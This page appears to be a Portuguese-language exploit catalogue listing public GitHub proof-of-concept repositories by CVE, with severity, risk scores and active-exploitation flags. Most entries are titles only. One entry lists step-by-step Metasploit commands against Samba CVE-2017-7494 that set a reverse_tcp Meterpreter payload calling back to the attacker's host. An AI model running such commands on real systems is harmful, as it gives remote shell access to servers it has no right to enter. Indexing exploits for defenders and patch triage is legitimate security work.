Exploração pública

Catálogo de exploits

Todo exploit público que catalogamos, num índice só. Busque por CVE, nome do exploit ou tecnologia — e veja, ao lado, o que a falha realmente vale: severidade, probabilidade de exploração e se já está sob ataque.

79.697exploits catalogados
36.715CVEs com exploração pública
24.695testados em laboratório
14.997 exploits
GitHub PoC
CVE-2026-58138 — Conductor (3.21.21..<3.30.2) unauthenticated RCE via INLINE GraalVM evaluator (HostAccess.ALL). Lab + PoC, verified e2e (root).
CVE-2026-58138CRITICAL30 jun 2026
Orkes Conductor 3.21.21 < 3.30.2 Unauthenticated RCE via GraalVM Script Evaluators
63RISCO
abrir
GitHub PoC1
POC for CVE-2026-48907
CVE-2026-48907CRITICALsob ataque30 jun 2026
Joomla Extension - joomlacontenteditor.net - Remote Code Execution in JCE extension for Joomla < 2.9.99.5
100RISCO
abrir
GitHub PoC
CVE-2026-46490 — samlify <2.13.0 SAML AttributeValue XML injection -> signed-assertion privilege escalation. Self-contained PoC, verified e2e.
CVE-2026-46490HIGH30 jun 2026
samlify: XML Injection in AttributeValue Allows Privilege Escalation in Signed SAML Assertions
41RISCO
abrir
GitHub PoC2
Citrix NetScaler CVE Preconditions Checker as per CTX696604 | Supported CVE : CVE-2026-8451, CVE-2026-8452, CVE-2026-8655, CVE-2026-10816, CVE-2026-10817, and CVE-2026-13474
CVE-2026-8451HIGH30 jun 2026
Insufficient input validation leading to memory overread
46RISCO
abrir
GitHub PoC
PoC exploit for CVE-2026-10580 - Authentication Bypass in Hippoo Mobile App for WooCommerce <= 1.9.4 leading to Admin Account Takeover
CVE-2026-10580CRITICAL30 jun 2026
Hippoo Mobile App for WooCommerce <= 1.9.4 - Unauthenticated Authentication Bypass to Administrator Account Takeover via REST API
63RISCO
abrir
GitHub PoC
CVE-2026-46817 - Draft
CVE-2026-46817CRITICALsob ataque30 jun 2026
Vulnerability in the Oracle Payments product of Oracle E-Business Suite (component: File Transmission). Supported versi
83RISCO
abrir
GitHub PoC
Independent reverse engineering and reproduction of CVE-2015-1187, an unauthenticated command injection in the D-Link DIR-820L (Rev A, v1.05B03). MIPS firmware extraction with binwalk, static analysis in Ghidra, and tracing the `ping_addr` parameter to its command-execution sink.
CVE-2015-1187CRITICALsob ataque30 jun 2026
The ping tool in multiple D-Link and TRENDnet devices allow remote attackers to execute arbitrary code via the ping_addr
100RISCO
abrir
GitHub PoC1
CVE-2025-40271 Modifed By MadEploits
CVE-2025-40271HIGH30 jun 2026
fs/proc: fix uaf in proc_readdir_de()
41RISCO
abrir
GitHub PoC
CVE-2012-1823 - PHP CGI Argument Injection Remote Code Execution (RCE)
CVE-2012-1823CRITICALsob ataque30 jun 2026
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not
100RISCO
abrir
GitHub PoC13
watchtowrlabs/watchTowr-vs-Netscaler-CVE-2026-8451
CVE-2026-8451HIGH30 jun 2026
Insufficient input validation leading to memory overread
46RISCO
abrir
GitHub PoC14
DirtySlide XNU Exploit (CVE-2026-43724) For MacOS
CVE-2026-43724HIGH30 jun 2026
The issue was addressed with improved input sanitization. This issue is fixed in iOS 18.7.10 and iPadOS 18.7.10, iOS 26.
41RISCO
abrir
GitHub PoC
CVE-2026-56121 — Feast <0.63.0 unauthenticated RCE via gRPC registry dill.loads of OnDemandFeatureView UDF (pre-auth). Lab + PoC, verified e2e.
CVE-2026-56121CRITICAL30 jun 2026
Feast < 0.63.0 Unauthenticated RCE via ApplyFeatureView gRPC Deserialization
48RISCO
abrir
GitHub PoC
Safari 跨域读取视频
CVE-2026-43700MEDIUM30 jun 2026
A cross-origin issue was addressed with improved tracking of security origins. This issue is fixed in Safari 26.5.2, iOS
33RISCO
abrir
GitHub PoC
CVE-2026-8037 - Draft
CVE-2026-8037CRITICALsob ataque30 jun 2026
OS Command Injection Remote Code Execution Vulnerability in Progress LoadMaster, ECS Connection Manager, Object Scale Connection Manager & MOVEit WAF
100RISCO
abrir
GitHub PoC
Defensive validation of CVE-2026-46331 / pedit COW with auditd, AppArmor, mitigation comparison and detection logic.
CVE-2026-46331HIGH30 jun 2026
net/sched: fix pedit partial COW leading to page cache corruption
41RISCO
abrir
GitHub PoC
rootdirective-sec/CVE-2026-55255-Lab
CVE-2026-55255HIGH30 jun 2026
Langflow: IDOR Vulnerability in `/api/v1/responses` Endpoint Allows Authenticated Attackers to Access Another User's Flow
41RISCO
abrir
GitHub PoC2
Kestra Auth-Bypass Vulnerability Checker
CVE-2026-49869CRITICAL30 jun 2026
Kestra: Unauthenticated Remote Code Execution via Authentication Bypass in `AuthenticationFilter`
48RISCO
abrir
GitHub PoC
Ovaj sto se skida isto ovaj s metasplotiom kucas msf console pa onda search CVE-2017-7494 pa use exploit/linux/samba/is_known_pipeline pa show options pa set RHOSTS (ip servera) set RPORt 445 (port za tu ranjivist) SET payload linux/x86/meterpreter/reverse_tcp SET LHOST ip kalija SET LORT 4444 pa exploit i ako je ranjiv dobijemo sesiju
CVE-2017-7494CRITICALsob ataqueransomware30 jun 2026
Samba since version 3.5.0 and before 4.6.4, 4.5.10 and 4.4.14 is vulnerable to remote code execution vulnerability, allo
100RISCO
abrir
GitHub PoC
Defensive validation of CVE-2026-46331 / pedit COW with auditd, AppArmor, mitigation comparison and detection logic.
CVE-2026-46331HIGH30 jun 2026
net/sched: fix pedit partial COW leading to page cache corruption
41RISCO
abrir
GitHub PoC11
app that ports CVE-2019-2215 to arm32 and mounts a su binary to /sbin with denylist + root app installer. firehose/Magisk guide included
CVE-2019-2215HIGHsob ataque30 jun 2026
A use-after-free in binder.c allows an elevation of privilege from an application to the Linux Kernel. No user interacti
100RISCO
abrir
GitHub PoC2
CVE-2026-43284 - CVE-2026-43500 - CVE-2026-46300 Variant of dirtyfrag exploit
CVE-2026-46300HIGH30 jun 2026
net: skbuff: preserve shared-frag marker during coalescing
56RISCO
abrir
GitHub PoC25
Python Proof of Concept for DirtyClone (CVE-2026-43503) - Linux kernel LPE via page-cache corruption
CVE-2026-43503HIGH29 jun 2026
net: skbuff: propagate shared-frag marker through frag-transfer helpers
41RISCO
abrir
GitHub PoC1
React2Shell (CVE-2025-55182) PoC
CVE-2025-55182CRITICALsob ataqueransomware29 jun 2026
A pre-authentication remote code execution vulnerability exists in React Server Components versions 19.0.0, 19.1.0, 19.1
100RISCO
abrir
GitHub PoC
Goal is to triage well known attacks and learn how security teams quickly respond.
CVE-2021-26855CRITICALsob ataqueransomware29 jun 2026
Microsoft Exchange Server Remote Code Execution Vulnerability
100RISCO
abrir
GitHub PoC
DirtyClone - local privilege escalation (LPE) proof-of-concept targeting a kernel/XFRM-related vulnerability described in the source as CVE-2026-43503
CVE-2026-43503HIGH29 jun 2026
net: skbuff: propagate shared-frag marker through frag-transfer helpers
41RISCO
abrir
GitHub PoC
Goal is to triage well known attacks and learn how security teams quickly respond.
CVE-2021-26855CRITICALsob ataqueransomware29 jun 2026
Microsoft Exchange Server Remote Code Execution Vulnerability
100RISCO
abrir
GitHub PoC
xitexploiter96-dot/CVE-2026-48907-
CVE-2026-48907CRITICALsob ataque29 jun 2026
Joomla Extension - joomlacontenteditor.net - Remote Code Execution in JCE extension for Joomla < 2.9.99.5
100RISCO
abrir
GitHub PoC
cve-2026-48907 scanner
CVE-2026-48907CRITICALsob ataque29 jun 2026
Joomla Extension - joomlacontenteditor.net - Remote Code Execution in JCE extension for Joomla < 2.9.99.5
100RISCO
abrir
GitHub PoC
Goal is to triage well known attacks and learn how security teams quickly respond.
CVE-2017-0144HIGHsob ataqueransomware29 jun 2026
The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows
100RISCO
abrir
GitHub PoC1
rootdirective-sec/CVE-2026-28496-Lab
CVE-2026-28496CRITICAL29 jun 2026
FOSSBilling: Server-side template injection in Twig template rendering enables information disclosure and RCE
63RISCO
abrir
anteriorpágina 50 / 500próximo

Indexamos apenas o link público para a prova de conceito — nunca hospedamos nem redistribuímos código de exploração. Fontes: PoC-in-GitHub, Exploit-DB, Nuclei, Metasploit e VulnCheck XDB. A existência de PoC pública não significa que a falha seja explorável no seu ambiente.